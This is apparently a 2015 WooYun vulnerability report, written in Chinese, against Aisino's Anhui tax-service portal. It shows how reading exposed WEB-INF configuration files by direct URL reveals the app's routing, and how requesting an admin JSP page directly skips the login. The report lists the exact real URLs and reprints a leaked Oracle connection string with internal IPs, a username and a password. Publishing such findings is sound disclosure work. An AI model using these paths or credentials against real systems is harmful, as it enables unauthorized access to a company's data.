XML架构安全之航天信息股份有限公司利用XML信息读取代码可绕过登录

编号123762
Urlhttp://www.wooyun.org/bug.php?action=view&id=123762
漏洞状态未联系到厂商或者厂商积极忽略
漏洞标题XML架构安全之航天信息股份有限公司利用XML信息读取代码可绕过登录
漏洞类型未授权访问/权限绕过
厂商航天信息股份有限公司
白帽子Ac4ary
提交日期2015-08-11 19:15:00
公开日期2015-09-25 19:16:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签权限绕过
关注数0
收藏数0
白帽评级
白帽自评rank8
厂商评级
厂商评rank8
漏洞简介
XML架构安全之航天信息股份有限公司利用XML信息读取代码可绕过登录
漏洞细节

XML架构安全之航天信息股份有限公司利用XML信息读取代码可绕过登录

POC

首先,接口处
http://ahnsfw.aisino.com/ahwsbsdt/login.jsp
看起来叼爆的一个后台
常见的密码都失效
其实我们还可以猜下xml信息文件,常规渗透测试失效的情况下,可以尝试 XML入侵,因为XML通常都存在于apache JSP配置中
比如:http://ahnsfw.aisino.com/WEB-inf/web.xmlhttp://ahnsfw.aisino.com/WEB-INF/config.xmlhttp://ahnsfw.aisino.com/WEB-inf/web.xmlhttp://ahnsfw.aisino.com/WEB-INF/config.xml
或者在二级目录下测试:http://ahnsfw.aisino.com/ahwsbsdt/web-INF/web.xml
我们可以发现已经成功了

p.png


接下来,我们刺探有用的信息
我们找下
找到好几个,如
<param-value>/WEB-INF/struts-config.xml</param-value></init-param><init-param><param-name>debug</param-name>
可以读他
<taglib-location>/WEB-INF/tld/struts-bean.tld</taglib-location></taglib><taglib><taglib-uri>http://struts.apache.org/tags-logic</taglib-uri><taglib-location>/WEB-INF/tld/struts-logic.tld</taglib-location></taglib></web-app>;
我们先来读
/WEB-INF/struts-config.xml的信息
http://ahnsfw.aisino.com/ahwsbsdt//WEB-INF/struts-config.xml

p0.png


果然我们可以发现POST提交方式,无论你输入用户密码,都会提交到PATH中
我们还发现了几个目录,如/download /taxReport "/theme
利用于上传中,通常可以先看下PATH
http://ahnsfw.aisino.com/ahwsbsdt//WEB-INF//download/
是存在的
还有一个http://ahnsfw.aisino.com/ahwsbsdt///WEB-INF/applicationContext.xml
<bean id="bsdtDS" class="org.apache.commons.dbcp.BasicDataSource"
destroy-method="close">
<property name="driverClassName">
<value>oracle.jdbc.OracleDriver</value>
</property>
<property name="url">
<value>jdbc:oracle:thin:@172.16.1.196:1521:nsfwdb</value>
</property>
<property name="username">
<value>htxx</value>
</property>
<property name="password">
<value>oracle</value>
</property>
</bean>

-->
可以发现oracle的数据,服务器在内网
ID地址也泄漏了
<property name="serviceUrl" value="http://61.190.68.67/nssbweb_ais/RpcServlet"/><property name="serviceInterface" value="aisino.nssb.ejb.NSSBRpc"/></bean><bean id="declarationAuthenticationService" class="org.springframework.remoting.caucho.HessianProxyFactoryBean"><property name="serviceUrl" value="http://192.168.2.13:8011/ahwsbsdt/servlet/RpcServlet"/>
这时候我们不管,我们只管PATH
我们把<forward name="postslistforadmin" path="/adminpostlist.jsp"/> 结果转到地址上看看
就是
http://ahnsfw.aisino.com/ahwsbsdt/adminpostlist.jsp

psb.png


这样就直接绕过了登录接口限制。

修复方案

你懂!

状态信息 2015-08-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-25: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复(not set)
回应信息未能联系到厂商或者厂商积极拒绝漏洞Rank:8 (WooYun评价)